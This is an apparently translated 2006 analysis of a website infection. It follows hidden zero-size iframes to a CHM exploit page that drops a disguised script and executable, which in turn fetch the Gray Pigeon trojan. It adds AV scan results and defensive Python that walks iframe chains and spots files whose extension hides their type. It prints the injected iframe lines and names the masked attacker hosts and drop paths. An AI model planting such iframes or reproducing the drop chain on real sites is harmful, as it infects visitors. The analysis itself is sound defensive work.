Original writeup by endurer
2006-05-04, 1st edition
The following was injected into a certain website:
<iframe src="hxxp://95762.***512j.com/" width="0" height="0">
The content of hxxp://95762.***512j.com/index is:
<iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"></iframe>
The content of hxxp://www.***kkkshop.com/images/index.htm is:
<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"></iframe>
hxxp://www.***kkkshop.com/cnshop/img/index.htm holds the escope() code, which exploits the CHM vulnerability to download two files, young.gif and young.css. Neither file is what its extension suggests: young.gif is a script and young.css is an executable.
young.gif uses WSH (Windows Script Host) to search the IE temporary cache for young.css, copies it to C:\arcldrer.exe and runs it; it then creates c:\cmd.bat to remove its traces.
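As an added illustration (not part of endurer's original writeup): the redirection above is a chain of zero-size iframes, each hop one page deeper, ending on the page that carries the exploit. The Python below walks such a chain offline over constructed stand-in pages. The hostnames are the masked ones from this post, but the victim hostname `victim.example` and the page bodies are assumptions reconstructed from the description, not captures of the real pages. `fetch` is any callable that returns a page body for a URL (here a dict lookup), so the same walker can be pointed at saved copies of an infected site.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in pages. Assumption: bodies are reconstructed from the
# description above and the victim hostname is invented; none is a real capture.
PAGES = {
    "hxxp://victim.example/":
        '<html><body><h1>shop</h1>'
        '<iframe src="hxxp://95762.***512j.com/" width="0" height="0">'
        '</body></html>',
    "hxxp://95762.***512j.com/":
        '<iframe src="hxxp://www.***kkkshop.com/images/index.htm" '
        'width="0" height="0"></iframe>',
    "hxxp://www.***kkkshop.com/images/index.htm":
        '<iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" '
        'width="0" height="0"></iframe>',
    "hxxp://www.***kkkshop.com/cnshop/img/index.htm":
        # terminal page: exploit code instead of another hop (stub only)
        '<script>function escope(){ /* exploit stub */ }</script>',
}

# "0", "00", "0px" all render nothing; anything else is treated as visible
_ZERO = re.compile(r"\s*0+(?:px)?\s*$")


def is_hidden_iframe(attrs):
    """True when the iframe is sized or styled so the user cannot see it."""
    if _ZERO.match(attrs.get("width", "x")) or _ZERO.match(attrs.get("height", "x")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class _IframeCollector(HTMLParser):
    """Collects the src of every hidden iframe; unclosed tags are fine."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("src") and is_hidden_iframe(a):
            self.hidden.append(a["src"].strip())


def extract_hidden_iframes(html):
    """Return the src of every hidden iframe in the page, in document order."""
    p = _IframeCollector()
    p.feed(html)
    p.close()
    return p.hidden


def walk_chain(start_url, fetch, max_hops=10):
    """Follow hidden iframes breadth-first starting at start_url.

    fetch(url) returns the page body or None. Returns the URLs in the order
    they were reached. A seen-set cuts loops and max_hops caps the depth, so a
    self-referencing injection cannot spin the walker forever.
    """
    order, seen, queue = [], {start_url}, [start_url]
    while queue and len(order) < max_hops:
        url = queue.pop(0)
        order.append(url)
        body = fetch(url)
        if body is None:
            continue
        for nxt in extract_hidden_iframes(body):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return order


if __name__ == "__main__":
    for depth, url in enumerate(walk_chain("hxxp://victim.example/", PAGES.get)):
        print("  " * depth + url)
```

Every hop after the first is a page the victim's browser loads without the visitor seeing anything, so the last URL in the list is the one to pull apart; it is the only page in the chain with no further hidden iframe.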
Complete scanning result of "young.gif", received in VirusTotal at 05.04.2006, 04:48:34 (CET).
Antivirus            Version          Update       Result
AntiVir              6.34.0.24        04.20.2006   no virus found
Avast                4.6.695.0        05.03.2006   no virus found
AVG                  386              05.04.2006   no virus found
Avira                6.34.1.58        05.03.2006   no virus found
BitDefender          7.2              05.04.2006   Exploit.HTML.Mht.ABR
CAT-QuickHeal        8.00             05.03.2006   no virus found
ClamAV               devel-20060426   05.03.2006   no virus found
DrWeb                4.33             05.03.2006   Trojan.DownLoader.4263
eTrust-InoculateIT   23.71.146        05.04.2006   no virus found
eTrust-Vet           12.4.2191        05.02.2006   no virus found
Ewido                3.5              05.03.2006   no virus found
Fortinet             2.71.0.0         05.04.2006   no virus found
F-Prot               3.16c            05.03.2006   no virus found
young.css is a PE-format file. It downloads hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe and saves it as C:\Program Files\zone.exe. zone.exe is Gray Pigeon (灰鸽子), a remote-control trojan.
Rising (瑞星) detects young.css as Trojan.DL.Delf.it.
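Added example, not from the original post: both dropped files are disguised by extension, young.gif being script and young.css a PE executable, and the AV results above show how little that disguise costs the attacker. The Python below checks a downloaded file's real type against what its name claims, by reading the MZ/PE headers and a few image magic numbers rather than trusting the extension. The sample bytes are constructed stand-ins (a minimal MZ header with a valid e_lfanew pointing at a PE signature, and a one-line VBScript), not the actual payloads; zone.exe is not modelled.

```python
import os
import struct

# Magic numbers for formats the dropper likes to hide behind
SIGNATURES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}
# What a file with this extension should contain
EXPECTED = {".gif": "gif", ".png": "png", ".jpg": "jpg", ".css": "text",
            ".exe": "pe", ".dll": "pe"}
# Strings a WSH / browser script dropper can hardly avoid
SCRIPT_MARKERS = (b"WScript", b"CreateObject(", b"Scripting.FileSystemObject",
                  b"ActiveXObject(", b"<script")


def is_pe(data):
    """MZ stub plus a 'PE\\0\\0' signature at the offset stored in e_lfanew (0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify(data):
    """Type of the content itself, ignoring the file name entirely."""
    if is_pe(data):
        return "pe"
    for ext, magics in SIGNATURES.items():
        if data.startswith(magics):
            return EXPECTED[ext]
    if any(m in data for m in SCRIPT_MARKERS):
        return "script"
    if all(32 <= b < 127 or b in (9, 10, 13) for b in data[:4096]):
        return "text"
    return "binary"


def check_payload(name, data):
    """Compare the claimed type (from the extension) with the real one."""
    ext = os.path.splitext(name)[1].lower()
    actual = classify(data)
    expected = EXPECTED.get(ext)
    return {"name": name, "claimed": expected or "unknown", "actual": actual,
            "suspicious": expected is not None and actual != expected}


def scan(files):
    """Names whose content contradicts their extension, in input order."""
    return [n for n, d in files.items() if check_payload(n, d)["suspicious"]]


def _fake_pe():
    # Constructed: 64-byte MZ header whose e_lfanew points just past it
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20


# Constructed stand-ins for the files named in the writeup (not the real ones)
SAMPLES = {
    "young.css": _fake_pe(),
    "young.gif": b'Set fso = CreateObject("Scripting.FileSystemObject")\r\n',
    "logo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 10,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(check_payload(name, data))
```

Run over a proxy cache or the IE Temporary Internet Files directory, this flags exactly the pair the dropper relies on: a ".css" that starts with MZ and a ".gif" full of CreateObject calls, while a genuine image passes.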